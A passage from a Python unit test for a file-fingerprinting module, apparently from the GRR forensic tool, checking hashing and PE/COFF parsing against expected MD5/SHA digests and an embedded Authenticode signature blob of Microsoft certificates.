dummy = b'12345'
fp = fingerprint.Fingerprinter(io.BytesIO(dummy))
big_finger = fingerprint.Finger(None, [fingerprint.Range(0, len(dummy))],
None)
hasher = self.MockHasher()
big_finger.hashers = [hasher]
fp.fingers.append(big_finger)
# Let's process the block
fp._HashBlock(dummy, 0, len(dummy))
self.assertEqual(hasher.seen, dummy)
def testSampleDataParsedCorrectly(self):
for fname, expected in self.SAMPLE_LIST.items():
path = package.ResourcePath(
'grr-response-test',
os.path.join('grr_response_test', 'test_data', 'fingerprint', fname))
with io.open(path, 'rb') as f:
fp = fingerprint.Fingerprinter(f)
fp.EvalGeneric()
fp.EvalPecoff()
result = fp.HashIt()
self.assertCountEqual(result, expected,
'Hashing results for %s do not match.' % fname)
# pyformat: disable
SAMPLE_DATA_1 = [{
'sha256':
b"\xf2\xa7\xccd[\x96\x94l\xc6[\xf6\x0e\x14\xe7\r\xc0\x9c\x84\x8d'\xc7\x94<\xe5\xde\xa0\xc0\x1ak\x864\x80",
'sha512':
b"-\x04\xe5*]N\xaa\xab\x96\xbefQ\xb7\xa0d\x13\xe04w\x84\x0fg^\xe7>$7a\xb2\x19\x19\xe5&\x8ew+\x99\xe2\xfc\xb5\xb9`\xd7\x89\xc5>\xbc\x1b\xff\x83`\x1d''2\xd4KaeS\xe1tj\x0f",
'name':
'generic',
'md5':
b'\xb5\xb8\xb5\xef.\\\xb3M\xf8\xdc\xf8\x83\x1e54\xfa',
'sha1':
b'\x98\xcc;\x8f81\x1a\xbf\xdfW{\xe4\x03\xff\x9ft\xaaU\xf7E'
}, {
'SignedData': [(
512, 2,
b'0\x82\x1c4\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x1c%0\x82\x1c!\x02\x01\x011\x0b0\t\x06\x05+\x0e\x03\x02\x1a\x05\x000h\x06\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Z0X03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x03\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x00b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0!0\t\x06\x05+\x0e\x03\x02\x1a\x05\x00\x04\x14\x9b\xd4D\xd5\x8bY\xcc\xa82\xbb_\xc9\x11\xf8\x1flf\xb4\x0f\xcc\xa0\x82\x17\t0\x82\x04\xbb0\x82\x03\xa3\xa0\x03\x02\x01\x02\x02\na\x04\xcai\x00\x00\x00\x00\x00\x080\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000w1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1!0\x1f\x06\x03U\x04\x03\x13\x18Microsoft Time-Stamp PCA0\x1e\x17\r070605220321Z\x17\r120605221321Z0\x81\xa41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1\'0%\x06\x03U\x04\x0b\x13\x1enCipher DSE ESN:A5B0-CDE0-DC941%0#\x06\x03U\x04\x03\x13\x1cMicrosoft Time-Stamp Service0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xaf\xf8Z\xf64\xb1\xa2\x0f\x8e\xac\xcf\xfc\x18\xf0\xad%\rq\xbb_[\xb7;7A\x13$\x1c\xea#\xc5\xae\xac\x99\xc0\xdc\xa6#\xf0\xca\xa9302j/\x9a!B\x02\t&Y\x9bP\xe9Wq\x8bg\xeb\x97\xe8\x04s\x8bx\xb1\x98@F\xa3Z\x01(\x00\x16\xa0\xda\xc5N\x8b\xa9\tT\x911\x9c\xff\xc4\x90\x95E\x07\x1d\x80(\x05\x06q\x80\xcb\xac8ga\xec\xc2_\x16\x9d\x7f\xb0?\xd1*\xf72os=|n\x986\x9a\x86\xee\x008\xee\x17\xecOU3F\x81z@\xdc\xa5\xf5\xd2#\x86]+3O$H\x93\x1a\xb1\xb4~\xcf\xdf3\x1b\xbf\xd5[\xc6/\x13\xf3\xe6\x84\xb7N\x93\x98\xbc\x00\xeb\\\x1di\xc5\xc8\xc8\xd2\xc4<\xb0\x00\x14\xe3\xb2\x9c\xf9\xa1\x1e\t\xdc\xd5\xf5m|213\xb2\x8fY\x9b\xfe\xca\x1f]"N\xba\x12\x1d\xf0g\xc3\x04\x89K\x7f\x03\xfd}\xd7T\x81\x03]I\xf5\x1e\xab 
~\xd2e\xb4q\x19\xe8L}\xc6\x94\xbd\x85\x91mPZ\xc3\xa9\x02\x03\x01\x00\x01\xa3\x82\x01\x190\x82\x01\x150\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\x9e\x8f\xa8t\xc1B\xee\x18\xcd=\xbd\xe9\xd6\xee\'\xb0\xc754g0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14#4\xf8\xd9RFp\n\xed@\xfbv\xfb\xb3+\xb0\xc35\xb3\x0f0T\x06\x03U\x1d\x1f\x04M0K0I\xa0G\xa0E\x86Chttp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04L0J0H\x06\x08+\x06\x01\x05\x05\x070\x02\x86<http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x06\xc00\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00g\xa5\xdf(Q\xdcH\x83\xfd\xc6e\xf9]\xfaf\xaa\xb2\x8d\xa7V\x9d\xa2H\xbe2\xacm\x97\x0fO\x0cD\xbb\xbb\x18\xf4\x90\xe7\xe2}\xc5t\x00\xd6\x86\xf3\x91\xc0\xd0\xd1\x05\x89^b\x8b\xfah\xf7e\xcf\xe6S\xa9\xdft\x12!\xad\x8c\x15\xb4\xa6\xcaC\x93\xc9k\xe1J\xb2\xed\x0f\xce\xb4\x8a:\x7f\xf7\xb5\xcc\xbc\x12\x9a{\xcf\x04\xc4?\xd9\n,u<\x92\x9e\xcf\x066b\x0e\x02\x17\xe6\x99\'\xf7\xfbq\xef\xffZzaU\xba\xba\x98\x87\xebq\xacv\xf5\xe8\x86\x9f6gPAx\xfc3\xa4\xd5is\x01\xc8p#k|\xa3W\xc8h\x07\xe4[A\xc1\xf8&\xfdiI\x03\x99\xd6\xaf\xc9?\xa4\xf5\x9cL\xf9\n\x9d\xd2\xcdK\xbf}\xfa\x16\x90\xec;qI\xfe\x04\x15\xca\xe2j\xdai\x0b\xb4\x93>4\xfe\xca\xec\x80I\xe4\xb2t\x18\xcc\x91\xe7>N\xb7{\xf5@\x8fd[\xd4P\xd59MS\xcd\xbe\xd4^G\x82[\xd1Zz\x99.Fpk\x07\x85\rl\t\x13c\x0fu0\x82\x05\x960\x82\x04~\xa0\x03\x02\x01\x02\x02\na\x01\xc6\xc1\x00\x00\x00\x00\x00\x070\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\x811\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1+0)\x06\x03U\x04\x03\x13"Microsoft Windows Verification PCA0\x1e\x17\r081022203922Z\x17\r100122204922Z0\x7f1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1\r0\x0b\x06\x03U\x04\x0b\x13\x04MOPR1\x1a0\x18\x06\x03U\x04\x03\x13\x11Microsoft Windows0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xdc:\xd3D\xf4n 
\x9f\xdd\xa4\x0e\x82N\xc7\x86^c\xcc\xca\xe5BSK\x85\xfa]ql\xcfv\x0c\x18\x8b\xa6\r\xf5J\xf7\xfe\x17\xf2\x90\xccb\xc7$\xad\x9b\x9a\xe1E;a\xd8\r\x05i\xc7\xcd\x88*\xb8\xb9\x18\x1e`\x10_\x88\xc6\xd2\x82NmI\xc5\xbe\\\x12\x86H\x85\x89\x91\x81\xcd\x1b\xad\x1f\xb7-gy\xf1{\x9f%\x87\x14v_\xe3\x0ed\xa1ra%\xe5ui\xc5\x14\xf1_\x07V\xa4\rp\x06#\xa7l\xdd\x82\xae\xd9\x9bG\xa4\xa5l\x08\xb0X\xf1SjO\xda\x85a\xcb\x02{I\xaf\x1f\xbb\xe0\xd7\xb9^\xdbs\x89v\xc1:\xbb\r\xf5\x97\xf0\x88]iw\x80\xcf\xf1~\x03\x9fsm\xde\x05\xb8/w\xb5TUE\xd0\xd28\xbd\x96\xe3\xf7\xea@\xe5\xac\x19\xfcq\xcb(\'\xaaq\xa1r\xb5\x12\'\xc1Q\xf66\xc5\xc0\xc7{::\x937\x04\xcc\xee\x0bixduA\xb6x"\x0fw\x84\xf7K\x8dFe\x92[MVku\x04F?\x0b\x1b\xb4\x19\xbf\x02\x03\x01\x00\x01\xa3\x82\x02\x0f0\x82\x02\x0b0\x1f\x06\x03U\x1d%\x04\x180\x16\x06\x08+\x06\x01\x05\x05\x07\x03\x03\x06\n+\x06\x01\x04\x01\x827\n\x03\x060\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\xa1\xe6\xc3e\xd0\xe6\xe8(b\xc2\xf3\xc2#\xa6\x1cI\x82\x0b\xd5S0\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x07\x800\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14\x90\x8b\x11\xa5p\xed\xe0\xf9\xa9\xc0\xac\x08\xc7\xb5\xf4\x82\xb1<\xc5J0{\x06\x03U\x1d\x1f\x04t0r0p\xa0n\xa0l\x864http://crl.microsoft.com/pki/crl/products/WinPCA.crl\x864http://www.microsoft.com/pki/crl/products/WinPCA.crl0R\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04F0D0B\x06\x08+\x06\x01\x05\x05\x070\x02\x866http://www.microsoft.com/pki/certs/MicrosoftWinPCA.crt0\x81\xc6\x06\x03U\x1d \x04\x81\xbe0\x81\xbb0\x81\xb8\x06\t+\x06\x01\x04\x01\x827\x15/0\x81\xaa0@\x06\x08+\x06\x01\x05\x05\x07\x02\x01\x164https://www.microsoft.com/pki/ssl/cps/WindowsPCA.htm0f\x06\x08+\x06\x01\x05\x05\x07\x02\x020Z\x1eX\x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00 \x00\xa9\x00 \x001\x009\x009\x009\x00-\x002\x000\x000\x005\x00 \x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00C\x00o\x00r\x00p\x00o\x00r\x00a\x00t\x00i\x00o\x00n\x00.0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00s_\xca\x80\x1c`Fo\xb94\x9d\x88\xe3\xbe"\x8c\xfa\xe6X\x9a\xab{\x1a\x97\xfd\xed.9\xccY[\x1dz\x06\x8a\xbbC\x93{\x1e\xa1\x88S\xdfD\xf8S\xa9\xea\xf6g\x1b:x\x84\x11jo)G\x90\n\x0c{"wNo\xb8d)\xdf\x06\xc7\xc8s\x84\xd6f\xa0\xca\xd9Z&\x82W\xf9\xe3O9\xaf.\x8e\xb1\x06[r\xf272\xaeN\xce<}\xb0\x12+\x9e\xa5u\xe3C\xa6\x12\x8b\x06\x14\x98w\xe3X2%`\x07\x8cYq\xa7qA\xb3\x06\x8d\\\xef\x9c\x7fZ"m\xb7\xd3\xd9\xf5\xa6\x1bR\xde\xf5~v|\xfe\xf4\xc8#\x1aK%\xeb\xe4\xee\xaf\x10\x0bU\xc3\xd8\xc1\x17\x85ao\xd3?\xb6\xe9\xec\x84\xa5\xeem\xb2\xff\xe8l\x95\xab+^\xc8\x85\xc3\x11`\xac\xfa\x02\x05\xf1{\xda\xc3iI\x96\xa5p\xf9efF\x10\x8d4\xe9!\x94<\x0fqJ\x1c\xea\x1f\xf7#\xa6\x87`4\xe9\x14\xe1\xde\x03Y\xb4\x02\x1d:\xaf\xe3U\x05\xf5\xed\xc1\xf4\xe4]\x0e\xd3\x970\x82\x06\x070\x82\x03\xef\xa0\x03\x02\x01\x02\x02\na\x16h4\x00\x00\x00\x00\x00\x1c0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority0\x1e\x17\r070403125309Z\x17\r210403130309Z0w1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1!0\x1f\x06\x03U\x04\x03\x13\x18Microsoft Time-Stamp PCA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\x9f\xa1l\xb1\xdf\xdbH\x92*|k.\x19\xe1\xbd\xe2\xe3\xc5\x99Q#P\xad\xce\xdd\x18N$\x0f\xee\xd1\xa7\xd1L\xadt0 
\x11\xeb\x07\xd5T\x95\x15I\x94\x1bB\x92\xae\x98\\0&\xda\x00k\xe8{\xbd\xec\x89\x07\x0f\xf7\x0e\x04\x98\xf0\x89\xcc\x1f\xcb3$\x87\x9d\xf2\xf4g\x1c,\xfc{\xe7\x88\x1d\xea\xe7N\xa3\xa1\xc1#S\xca\x8d\xfaE\xcf\t\xd0^\xaf\xd0\xb0B\x04\xa2\xf9\xa6l\x93g\xd7(\xdcFS\xb0\x86\xd0\xe5(F.\'\xac\x86OUR\x0c\xe4\x03,\xfbj\x90\x900n\x87\xf3Y0\x9d\xfa~\xd6\x97\xb3\xe8!\x97~\xf8\xd2\x13\xf3\x08\xb7SmR\xb4E\x90\x9fH\x00JGf\x11\')f\xa8\x97\xe4\xd3\x06\x81J\xa2\xf9\x84\xa7\x11G\x14\t\x82\x9f\x84\xedUx\xfe\x01\x9a\x1dP\x08\x85\x00\x100F\xed\xb7\xde#F\xbb\xc4-T\x9f\xaf\x1exA1w\xcc\x9b\xdf;\x83\x93\xa1a\x02\xb5\x1d\r\xb1\xfc\xf7\x9b\xb2\x01\xce"KT\xff\xf9\x05\xc3\xc2 \x0b\x02\x03\x01\x00\x01\xa3\x82\x01\xab0\x82\x01\xa70\x0f\x06\x03U\x1d\x13\x01\x01\xff\x04\x050\x03\x01\x01\xff0\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14#4\xf8\xd9RFp\n\xed@\xfbv\xfb\xb3+\xb0\xc35\xb3\x0f0\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x01\x860\x10\x06\t+\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000\x81\x98\x06\x03U\x1d#\x04\x81\x900\x81\x8d\x80\x14\x0e\xac\x82`@V\'\x97\xe5%\x13\xfc*\xe1\nS\x95Y\xe4\xa4\xa1c\xa4a0_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority\x82\x10y\xad\x16\xa1J\xa0\xa5\xadLsX\xf4\x07\x13.e0P\x06\x03U\x1d\x1f\x04I0G0E\xa0C\xa0A\x86?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04H0F0D\x06\x08+\x06\x01\x05\x05\x070\x02\x868http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x02\x01\x00\x10\x97\x8a\xc3\\\x03D6\xdd\xe9\xb4\xadw\xdb\xceyQM\x01\xb1.tq[m\x0c\x13\xab\xce\xbe{\x8f\xb8.\xd4\x12\xa2\x8cmb\xb8W\x02\xcbN \x13P\x99\xddz@\xe2W\xbb\xafX\x9a\x1c\xe1\x1d\x01\x86\xac\xbbx\xf2\x8b\xd0\xec;\x01\xee\xe2\xbe\x8f\n\x05\xc8\x8dH\xe2\xf0S\x15\xddO\xab\x92\xe4\xe7\x8dj\xd5\x80\xc1\xe6\x94\xf2\x06/\x85\x03\xe9\x91*$"p\xfb\xf6\xfc\xe4x\x99.\r\xf7\x07\xe2p\xbc\x18N\x9d\x8ek\nr\x95\xb8\xa19\x9cg-\xc5Q\x0e\xeab\\?\x16\x98\x8b ?\xe2\x07\x1a2\xf9\xcc1Jv1=+r\x0b\xc8\xeap=\xff\x85\n\x13\xdf\xc2\na\x8e\xf0\xd7\xb8\x17\xebN\x8b\x7f\xc55+^\xa3\xbf\xeb\xbc}\x0bB{\xd4Sr!\xee0\xca\xbbxe\\[\x01\x17\n\x14\x0e\xd2\xda\x14\x98\xf5<\xb9fX\xb3-/\xe7\xf9\x85\x86\xccQV\xe8\x9dp\x94l\xac9L\xd4\xf6y\xbf\xaa\x18zb)\xef\xa2\x9b)4\x06w\x1ab\xc9=\x1em\x1f\x82\xf0\x0b\xc7,\xbb\xcfC\xb3\xe5\xf9\xec}\xb5\xe3\xa4\xa8t5\xb8N\xc5q#\x12&v\x0b<R\x8cqZFC\x14\xbc\xb3\xb3\xb0Mg\xc8\x9fB\xff\x80y!\x80\x9e\x150f\xe8B\x12^\x1a\xc8\x9e"!\xd0C\xe9+\xe9\xbb\xf4H\xcc,\xd4\xd82\x80L&*H$_Z\xeaV\xef\xa6\xde\x99\x9d\xca:o\xbd\x81\'t\x06\x11\xeev!\xbf\x9b\x82\xc1\'T\xb6\xb1j=\x89\xa1va\xb4n\xa1\x13\xa6\xbf\xaaG\xf0\x12o\xfd\x8a2l\xb2\xfe\xdfQ\xc8\x8c#\xc9f\xbd\x9d\x1d\x87\x12d\x02=-\xafY\x8f\xb8\xe4!\xe5\xb5\xb0\xcac\xb4xT\x05\xd4A.P\xac\x94\xb0\xa5x\xab\xb3\xa0\x96u\x1a\xd9\x92\x87\x13u"/2\xa8\x08n\xa0[\x8c%\xbf\xa0\xef\x84\xca!\xd6\xeb\x1eO\xc9\x9a\xeeI\xe0\xf7\x01eo\x89\x0b}\xc8i\xc8\xe6n\xea\xa7\x97\xce1)\xff\x0e\xc5[\\\xd8M\x1b\xa1\xd8\xfa/\x9e?.U\x16k\xc9\x13\xa3\xfd0\x82\x06\xa10\x82\x04\x89\xa0\x03\x02\x01\x02\x02\na\x07\x02\xdc\x00\x00\x00\x00\x00\x0b0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate 
Authority0\x1e\x17\r050915215541Z\x17\r160315220541Z0\x81\x811\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1+0)\x06\x03U\x04\x03\x13"Microsoft Windows Verification PCA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xc5\xac\x93N\xe6J\x11\x9e7\xd05\xd2\xb0\x06\\\x83\x14\xa5a\x92\xfc\xfe\xb3\x89\xc1\xe6\xcd\xc8\x1f1\x84\t\x914F\x92,\xb8\xee,\xc5 s\xc4\xe8\x1a\xd8\x8d\xcezh\xb5fx\x8b\xe5`\x15\xa2\xf6)Z\x1d^]\xfcb\xd3\xc1\\)\x89\xfb3\xf8\x16\x956\xdd\xb1FtirS\xd5\xaa\xe8\x8a\x99\x1a\xd8\xf7g\t\xd9\t "8z\xd6\x03#\xd7\x89\x9f\x1c\x01\xb7Q\xdf\x98f*\x02\x8b\x06\xec\xe4)\xef[B\x17\x15\x97Q\x8d}%\n\xaf%\xe8\xde\xdc\x9bg\x16\nVs\x9d\xb3\x1d\x85\x83\x0b~3+b3\xce\x1c \x81K^\xd3\xc6I\xb8\xf6.\xd3N\xb0qDFd>\xdeCf\x04\xb9\xcc\x83H:\xc56z\x04H\x0b\x89\x02=c\xa2\x01v)\x97u\xe9\x01\xe6\x00\x97\t\x92\xf8\xe2\'\xf0)gCw\xc3P\x96S1\xe1\xb6q\x8b\xecw\xc7|1H\xd5\xb8%"\x8c\x00\xf7(8z\xbd|\xc7?\xcd@&w\xdd\x00\x00\x11\x9a\x95\xbe\x1f\xdb\x02\x03\x01\x00\x01\xa3\x82\x02:0\x82\x0260\x10\x06\t+\x06\x01\x04\x01\x827\x15\x01\x04\x03\x02\x01\x000\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\x90\x8b\x11\xa5p\xed\xe0\xf9\xa9\xc0\xac\x08\xc7\xb5\xf4\x82\xb1<\xc5J0\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x01\xc60\x0f\x06\x03U\x1d\x13\x01\x01\xff\x04\x050\x03\x01\x01\xff0\x81\x98\x06\x03U\x1d#\x04\x81\x900\x81\x8d\x80\x14\x0e\xac\x82`@V\'\x97\xe5%\x13\xfc*\xe1\nS\x95Y\xe4\xa4\xa1c\xa4a0_1\x130\x11\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\x03com1\x190\x17\x06\n\t\x92&\x89\x93\xf2,d\x01\x19\x16\tmicrosoft1-0+\x06\x03U\x04\x03\x13$Microsoft Root Certificate Authority\x82\x10y\xad\x16\xa1J\xa0\xa5\xadLsX\xf4\x07\x13.e0P\x06\x03U\x1d\x1f\x04I0G0E\xa0C\xa0A\x86?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04H0F0D\x06\x08+\x06\x01\x05\x05\x070\x02\x868http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0\x81\x80\x06\x03U\x1d \x04y0w0u\x06\t+\x06\x01\x04\x01\x827\x15/0h0f\x06\x08+\x06\x01\x05\x05\x07\x02\x020Z\x1eX\x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00 \x00\xa9\x00 \x001\x009\x009\x009\x00-\x002\x000\x000\x005\x00 \x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00C\x00o\x00r\x00p\x00o\x00r\x00a\x00t\x00i\x00o\x00n\x00.0\x1f\x06\x03U\x1d%\x04\x180\x16\x06\x08+\x06\x01\x05\x05\x07\x03\x03\x06\n+\x06\x01\x04\x01\x827\n\x03\x060\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x02\x01\x00%1\xa1X\xeaR\xe5\xe1\x17\x0c\xe6\xf1?x\xa3?r\xaf\xa7W\x10S\x89\x10^2\x9c\xb6p\xc3\x15+M\x1504\xe8\xc0j\xe4\x1c\xd3. 
eH\xd7\x1b\x98b!\xbaE\x9fJ\xec\xdb/\t\x19Q\xe5\xed2\x19Q/\xe1\xdd\xfb\xc6R\xfd\xeb\xc6\x82%B\x03\t\xa68\xb66\x1f\xcc\xc9\x80\xbbZi\x181\xc3\xb3\xa0\xb3gG\xbe\x9d\xc7\xe2?\x96\xb3\x88\xf8\x19\xbe9\xb9\xe9\x95\xce\xfc|\xaf\xa8\xcd\xd0A\x90\xe0\xd5\xb3\x1c/h\xbb\xdb\x0flj\xdd\xf2\xaf\xde\xf2\xb5\xde\r\xb6\xa6Z\xf0\x86\n\xb9m\x99K?{-\x01\x84l\x8f\x87\xdc\x7f\x8f\xab\x14\x88\xd0\x06\x914\xbe\x1b\x82"\xa4\xbcU\x8a\xad\x9b\xfcs\x14\x10\xc4\xc9\x19\x1e\x07}\x9b\x0e\xc0\x95&]\xc6\x1f\xac\xb4\xf2~\xba%pJ{\xd7\x8e\xd1\x9d\xa0\x13Iz\xb0\x02RR$\xf4\xaf\xdd@-\xe5>2X\xb3Jj\xdd\x11Y\xaa-\xbc\xa4\xa0s8\xf9@wk4\x19W\xcd8h\'\x82\xf8\xd1o\xeb#\xc0?R\xf3N\xd5\x02>j\x9a+\xc1\xf51q\xdbAM;\xde\xef\xad\xaf\x1f\x88eC\x1bQ\xb7\x9au\xca\x8eiI\x10\x8fx\x8atE\xb9\t\x8esw\x072JK\xd7h+\x98\xc5\xbaT\xea?\xcb\xa2\x00\x8c\xbb\xd8\x10X\xf2\xdb\xdc\x9b\xcd\xd8\xeaHC\xe2J~e\xb2\xdc\xf5-N%g\xa8\xe0\xb5\xba\xa7\xdd~^\xc1L\x02t\xc9\xb3n\xe3\xf8\xf0\x0b\xed\xfc\xb9)\xc5[\xc96Q\x90\xdbx}\xb92\x0f^v\xd2\x15\\;7!\xc6\xdb\xc9\x19n\xedt*\\,\x0bQIES\xb0\xb2\xb3#\xd4\xa1\xb0_\r\x19\xcd\x14\xa7\xe3<\x9b\x97r\x94\x14\xdf\xff\xc1\x90\x1b\xa5\xdf\xf5\xa9\xf3\x1b\x17\xda\xb5\xfcD\xe0\xe8\xe2<\xa2z\xbb\xbbe\xe6M\xb1\xb5\x15\xa1\xd9g;\xb0\x0c};\xe9\xeeQ*G\xf5\x15\x0f\x8c\xad].5\xdf\xf4\xa4.\xf6\x137Z+\xe8U\x9aI,\x97\xce\x9d\x01\x9e\x97F\\\xd9-\xbc$Z\x95YoM\xca\x9d\xd6W&1\x82\x04\x960\x82\x04\x92\x02\x01\x010\x81\x900\x81\x811\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft Corporation1+0)\x06\x03U\x04\x03\x13"Microsoft Windows Verification PCA\x02\na\x01\xc6\xc1\x00\x00\x00\x00\x00\x070\t\x06\x05+\x0e\x03\x02\x1a\x05\x00\xa0\x81\xba0\x19\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x040\x1c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0b1\x0e0\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x150#\x06\t*\x86H\x86\xf7\r\x01\t\x041\x16\x04\x14\xcd?\xf6\x88\xbe1\x7f\xaduK\n\xf5B\x99\xc6\xab\x81\xc92\x190Z\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0c1L0J\xa0$\x80"\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00W\x00i\x00n\x00d\x00o\x00w\x00s\xa1"\x80 http://www.microsoft.com/windows0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x04\x82\x01\x00\x9d\xe7\x0f`\xe4\xc2\t\xb35?\x93O\x08\xf6A\x9f\x0eiu\x89\xa17\xf3\x80\xa6\x9c\x90w3q9#\xa6>)\x8e\xbf\x98\xf8=\xee\x8ae\x83\x1b|\x0b{\xd7\th\x12}\x03~\r\x1b/K\xec=Y-\xfc\xc2\x8b8\x90v}\xdek1\xb57\x88\x90\x96\x83\xb51!\xa9\xd7\x15\x87\xfa\x12\xc1\x84\xf0\x91\x80\x0e#rH\x8a\x04\x97R\xba\xfe\xc3\xeb\xa1\xdb`\x08<1\n>*|\xae\xeex\xf4\xcd\x02b7\x00\xcf3/\x13>R{\xdf\xa0\xcb\x84\xa6cRg\xc8b\r\xb0|=:\xdf5M&\x0c*N\x83\xe9-\xa0 \xee)ZJ\xadD\xb95\t\xa4\x0f\xa2(c\xe9\xdb\xd0;\xcb0\xdd!{}\xec\x8a/\xe3\xfa\xdf9\x1aa\xf8EF\x9eC\xd4H\xbaT>4\x9f\x88si]\x85\xae\xdev\xf4{\x968\x0b\r\x11\xa4^/qN\xf1\xd9n~\x00\xa4J\xc0\x88\xe4\xf0\x02\xae\\\x94\xd6\r\xbf\'\xdfSQ\x08\xd2$\x18\xd0\xba"\x91\xe7\xc4\x0b\xa1\x82\x02\x1d0\x82\x02\x19\x06\t*\x86H\x86\xf7\r\x01\t\x061\x82\x02\n0\x82\x02\x06\x02\x01\x010\x81\x850w1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nWashington1\x100\x0e\x06\x03U\x04\x07\x13\x07Redmond1\x1e0\x1c\x06\x03U\x04\n\x13\x15Microsoft 